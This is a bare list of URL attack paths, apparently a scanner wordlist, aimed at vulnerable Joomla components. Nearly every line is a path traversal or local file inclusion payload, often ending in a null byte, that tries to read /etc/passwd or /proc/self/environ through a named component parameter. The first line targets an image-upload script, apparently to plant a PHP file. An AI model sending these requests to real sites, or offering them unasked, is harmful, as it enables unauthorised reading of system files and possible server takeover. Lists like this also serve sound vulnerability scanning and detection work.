/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php")
/components/com_sebercart/getPic.php?p=/etc/passwd
/components/com_xgallery/helpers/img.php?file=/etc/passwd
/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_dioneformwizard&controller=/etc/passwd
/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00

/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
/index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
/index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_php&file=../../../../../../../../../../etc/passwd
/index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_xcomp&controller=../../etc/passwd%00

/index.php?option=com_xvs&controller=../../etc/passwd%00
/patch/makedown.php?arquivo=../../../../etc/passwd